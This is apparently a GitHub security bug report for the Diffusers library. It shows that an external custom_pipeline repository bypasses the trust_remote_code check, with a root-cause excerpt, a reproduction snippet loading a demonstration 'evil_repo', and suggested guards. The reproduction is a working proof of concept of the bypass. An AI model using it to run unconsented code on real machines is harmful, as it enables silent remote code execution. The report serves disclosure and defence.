Describe the bug
The DiffusionPipeline.from_pretrained API in the Diffusers library allows users to specify a custom_pipeline, which can point to an external Hugging Face repository containing a pipeline.py. This feature enables flexible extension of pipelines but may raise critical security concerns.
The current implementation enforces the trust_remote_code check only on the main model repository (pretrained_model_name), but fails to validate the external repository specified via custom_pipeline.
As a result, even when trust_remote_code=False, Diffusers may still download and execute arbitrary Python code from an attacker-controlled repository referenced by custom_pipeline. This creates a bypass of the intended security mechanism, leading to silent remote code execution.
Root Cause
diffusers/src/diffusers/pipelines/pipeline_utils.py, lines 1676 to 1704 in dc8d903:

    load_pipe_from_hub = custom_pipeline is not None and f"{custom_pipeline}.py" in filenames
    load_components_from_hub = len(custom_components) > 0

    if load_pipe_from_hub and not trust_remote_code:
        raise ValueError(
            f"The repository for {pretrained_model_name} contains custom code in {custom_pipeline}.py which must be executed to correctly "
            f"load the model. You can inspect the repository content at https://hf.co/{pretrained_model_name}/blob/main/{custom_pipeline}.py.\n"
            f"Please pass the argument `trust_remote_code=True` to allow custom code to be run."
        )

    if load_components_from_hub and not trust_remote_code:
        raise ValueError(
            f"The repository for {pretrained_model_name} contains custom code in {'.py, '.join([os.path.join(k, v) for k, v in custom_components.items()])} which must be executed to correctly "
            f"load the model. You can inspect the repository content at {', '.join([f'https://hf.co/{pretrained_model_name}/{k}/{v}.py' for k, v in custom_components.items()])}.\n"
            f"Please pass the argument `trust_remote_code=True` to allow custom code to be run."
        )

    # retrieve passed components that should not be downloaded
    pipeline_class = _get_pipeline_class(
        cls,
        config_dict,
        load_connected_pipeline=load_connected_pipeline,
        custom_pipeline=custom_pipeline,
        repo_id=pretrained_model_name if load_pipe_from_hub else None,
        hub_revision=revision,
        class_name=custom_class_name,
        cache_dir=cache_dir,
        revision=custom_revision,
    )
The check only tests whether the main repository contains a file named {custom_pipeline}.py; it never inspects the external repository referenced by custom_pipeline. Therefore, if custom_pipeline points to another repository (e.g., XManFromXlab/diffuser-custom-pipeline) and the main repo does not contain the corresponding .py file, load_pipe_from_hub evaluates to False. The security check is then skipped entirely, and Diffusers proceeds to fetch the external repository and to load and execute its pipeline.py. This is a trust boundary violation: remote code runs without explicit user consent.
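The evaluation described above can be traced with a small standalone sketch. It does not import Diffusers; `existing_gate_blocks` only mirrors the boolean logic quoted from pipeline_utils.py, while `stricter_gate_blocks` and the `main_repo_files` listing are hypothetical names and values introduced here for illustration. The stricter rule is one possible policy, not the maintainers' fix, and it would also reject other uses of custom_pipeline when trust_remote_code=False, which may be stricter than desired.

```python
from typing import Optional, Sequence


def existing_gate_blocks(
    custom_pipeline: Optional[str],
    filenames: Sequence[str],
    trust_remote_code: bool,
) -> bool:
    """Mirror of the quoted check: True means loading would be refused."""
    # Only looks for "<custom_pipeline>.py" among the MAIN repository's files.
    load_pipe_from_hub = (
        custom_pipeline is not None and f"{custom_pipeline}.py" in filenames
    )
    return load_pipe_from_hub and not trust_remote_code


def stricter_gate_blocks(
    custom_pipeline: Optional[str],
    trust_remote_code: bool,
) -> bool:
    """Hypothetical policy: any custom pipeline requires explicit trust."""
    return custom_pipeline is not None and not trust_remote_code


# Illustrative file listing for the benign main repository (assumed, not fetched).
main_repo_files = [
    "model_index.json",
    "scheduler/scheduler_config.json",
    "unet/config.json",
]
external_repo = "XManFromXlab/diffuser-custom-pipeline"

# The main repo has no "XManFromXlab/diffuser-custom-pipeline.py", so the
# existing gate does not fire even though trust_remote_code is False.
bypassed = not existing_gate_blocks(external_repo, main_repo_files, False)
blocked_by_stricter_rule = stricter_gate_blocks(external_repo, False)

print("existing gate bypassed:", bypassed)                   # True
print("stricter gate blocks:", blocked_by_stricter_rule)     # True
```

The difference is that the stricter predicate does not depend on what the main repository happens to contain, so an external custom_pipeline cannot slip past it.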
Reproduction
I created an example model repository on HuggingFace Hub for demonstration: XManFromXlab/diffuser-custom-pipeline. Note that the trust_remote_code flag is set to False.
    from diffusers import DiffusionPipeline

    benign_repo = "google/ddpm-cifar10-32"
    evil_repo = "XManFromXlab/diffuser-custom-pipeline"
    DiffusionPipeline.from_pretrained(
        benign_repo, custom_pipeline=evil_repo, trust_remote_code=False
    )
Running this example prints the following messages, which shows that code from the external repository was executed despite trust_remote_code=False:
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
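Until the library-side check covers this case, callers could guard the call themselves. The following is a minimal sketch under stated assumptions: `guarded_from_pretrained` is a hypothetical helper, not part of Diffusers, and the loader is passed in as a callable so the sketch runs without the library installed. In real use the loader would be `DiffusionPipeline.from_pretrained`, which accepts the `custom_pipeline` and `trust_remote_code` keyword arguments shown in the reproduction.

```python
from typing import Any, Callable, Optional


def guarded_from_pretrained(
    loader: Callable[..., Any],
    model_id: str,
    *,
    custom_pipeline: Optional[str] = None,
    trust_remote_code: bool = False,
    **kwargs: Any,
) -> Any:
    """Call `loader` only if any custom pipeline code was explicitly trusted.

    Hypothetical caller-side guard: it refuses every custom_pipeline value
    unless trust_remote_code=True, regardless of where the code lives.
    """
    if custom_pipeline is not None and not trust_remote_code:
        raise ValueError(
            f"custom_pipeline={custom_pipeline!r} would load Python code; "
            "pass trust_remote_code=True only after reviewing that code."
        )
    return loader(
        model_id,
        custom_pipeline=custom_pipeline,
        trust_remote_code=trust_remote_code,
        **kwargs,
    )


# Intended usage (requires diffusers; shown as a comment so the sketch stays
# self-contained):
#
#   from diffusers import DiffusionPipeline
#   guarded_from_pretrained(
#       DiffusionPipeline.from_pretrained,
#       "google/ddpm-cifar10-32",
#       custom_pipeline="XManFromXlab/diffuser-custom-pipeline",
#   )  # raises ValueError before anything is downloaded
```

Because the guard runs before the loader is called, nothing is fetched or imported when the check fails.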
Logs
System Info
- 🤗 Diffusers version: 0.38.0.dev0
- Platform: Linux-6.8.0-88-generic-x86_64-with-glibc2.39
- Running on Google Colab?: No
- Python version: 3.12.3
- PyTorch version (GPU?): 2.11.0+cu130 (False)
- Flax version (CPU?/GPU?/TPU?): not installed (NA)
- Jax version: not installed
- JaxLib version: not installed
- Huggingface_hub version: 1.10.1
- Transformers version: not installed
- Accelerate version: not installed
- PEFT version: not installed
- Bitsandbytes version: not installed
- Safetensors version: 0.7.0
- xFormers version: not installed
- Accelerator: NVIDIA H200 NVL, 143771 MiB
NVIDIA H200 NVL, 143771 MiB
NVIDIA H200 NVL, 143771 MiB
- Using GPU in script?:
- Using distributed or parallel set-up in script?:
Who can help?
@sayakpaul @DN6